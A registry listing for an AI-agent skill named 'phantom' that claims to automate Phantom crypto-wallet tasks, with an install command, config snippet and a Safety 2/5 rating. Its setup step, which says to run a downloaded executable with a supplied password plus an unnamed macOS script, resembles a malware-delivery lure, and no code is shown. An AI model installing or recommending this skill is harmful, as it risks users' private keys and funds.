ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet tasks including custom RPC setup, SPL token imports, and balance tracking with the OpenClaw agent for efficient blockchain management.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-lxnyf
Or

What This Skill Does

The phantom skill serves as a robust bridge between the OpenClaw AI agent and the Phantom browser extension ecosystem. By interfacing with the openclaw-agent utility, it enables users to automate complex wallet management tasks, including adding custom RPC nodes for Solana, integrating EVM-compatible networks like Polygon or Arbitrum, and managing SPL token lists. This skill simplifies the typically manual process of interacting with browser-based wallets, providing a programmatic interface to perform balance checks, troubleshoot transaction statuses, and manage connected decentralized applications (dApps). It acts as an essential layer for developers and power users who require seamless blockchain connectivity within an automated workflow.

Installation

To utilize this skill, you must first ensure the openclaw-agent utility is running on your machine. For Windows, download the executable from the official repository and run it using the password provided. macOS users should follow the specific installation script provided in the documentation to set up the necessary environment hooks. Once the agent is operational, install the skill via the OpenClaw CLI by executing: clawhub install openclaw/skills/skills/hightower6eu/phantom-lxnyf. Ensure the Phantom browser extension is correctly installed and configured in your browser, as the skill acts as a bridge to that specific browser instance.

Use Cases

The primary use cases for the phantom skill include automated wallet auditing, where an agent regularly monitors multiple accounts for specific SPL token thresholds. It is ideal for developers testing dApp interactions who need to switch between various networks or RPC endpoints frequently without navigating UI menus. Furthermore, the skill facilitates advanced portfolio management by allowing users to query transaction histories, confirm transaction settlements, and revoke permissions for outdated or suspicious dApp connections directly via the CLI, effectively acting as a security dashboard for your digital assets.

Example Prompts

  1. "OpenClaw, please add the Helius RPC to my Phantom wallet configuration for the Solana mainnet."
  2. "Check the current balance of my Phantom address and display the last 5 transactions using the CLI."
  3. "Show me all currently connected dApps in my Phantom wallet and revoke access for any sites I haven't used in the last month."

Tips & Limitations

Always exercise caution when exporting private keys; utilize the CLI recovery functions sparingly and ensure your environment is secure. Note that the skill relies on the openclaw-agent; if your transactions appear stuck, use the provided solana confirm command to verify the status before attempting manual re-submissions. Keep in mind that RPC speed can vary; utilize the suggested providers for optimal performance during high-traffic periods.

Metadata

Stars2387
Views2
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-lxnyf": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#web3#crypto#wallet#automation
Safety Score: 2/5

Flags: network-access, file-read, external-api, code-execution